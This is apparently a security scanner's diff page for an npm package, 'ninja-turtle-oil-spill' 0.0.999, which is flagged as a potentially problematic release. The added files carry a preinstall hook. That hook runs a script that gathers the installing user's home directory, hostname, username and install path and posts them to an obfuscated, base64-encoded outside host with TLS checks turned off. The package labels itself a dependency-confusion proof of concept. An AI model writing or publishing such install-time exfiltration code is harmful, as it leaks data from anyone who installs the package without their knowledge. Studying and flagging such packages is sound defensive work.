ninja-turtle-oil-spill 0.0.999
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of ninja-turtle-oil-spill might be problematic. Click here for more details.
- package/index.js +38 -0
- package/package.json +11 -0
package/index.js
ADDED
|
@@ -0,0 +1,38 @@
|
|
|
1
|
+
// non-malicious security research. Contact: webhak@forenk.uk
|
|
2
|
+
const os = require("os")
|
|
3
|
+
const http = require("https")
|
|
4
|
+
const packageJson = require("./package.json")
|
|
5
|
+
const pkgName = packageJson.name
|
|
6
|
+
|
|
7
|
+
const genRanHex = size => [...Array(size)].map(() => Math.floor(Math.random() * 16).toString(16)).join('')
|
|
8
|
+
|
|
9
|
+
const postData = JSON.stringify({
|
|
10
|
+
pkg: pkgName,
|
|
11
|
+
pkgjson: packageJson,
|
|
12
|
+
dir: __dirname,
|
|
13
|
+
home: os.homedir(),
|
|
14
|
+
host: os.hostname(),
|
|
15
|
+
username: os.userInfo().username,
|
|
16
|
+
})
|
|
17
|
+
|
|
18
|
+
var options = {
|
|
19
|
+
hostname: `${genRanHex(6)}.${pkgName}.${Buffer.from('aDR4Lm5pbmph', 'base64')}`,
|
|
20
|
+
port: 443,
|
|
21
|
+
path: "/",
|
|
22
|
+
method: "POST",
|
|
23
|
+
headers: {
|
|
24
|
+
'Content-Type': 'application/json',
|
|
25
|
+
'Content-Length': Buffer.byteLength(postData)
|
|
26
|
+
}
|
|
27
|
+
}
|
|
28
|
+
|
|
29
|
+
process.env["NODE_TLS_REJECT_UNAUTHORIZED"] = 0;
|
|
30
|
+
|
|
31
|
+
var req = http.request(options, (res) => {
|
|
32
|
+
res.on("data", (d) => {
|
|
33
|
+
process.stdout.write(d);
|
|
34
|
+
})
|
|
35
|
+
})
|
|
36
|
+
|
|
37
|
+
req.write(postData)
|
|
38
|
+
req.end()
|
package/package.json
ADDED
|
@@ -0,0 +1,11 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "ninja-turtle-oil-spill",
|
|
3
|
+
"version": "0.0.999",
|
|
4
|
+
"description": "Proof of Concept package for Dependency Confusion security issues.",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"preinstall": "node index.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "webhak@forenk.uk",
|
|
10
|
+
"license": "MIT"
|
|
11
|
+
}
|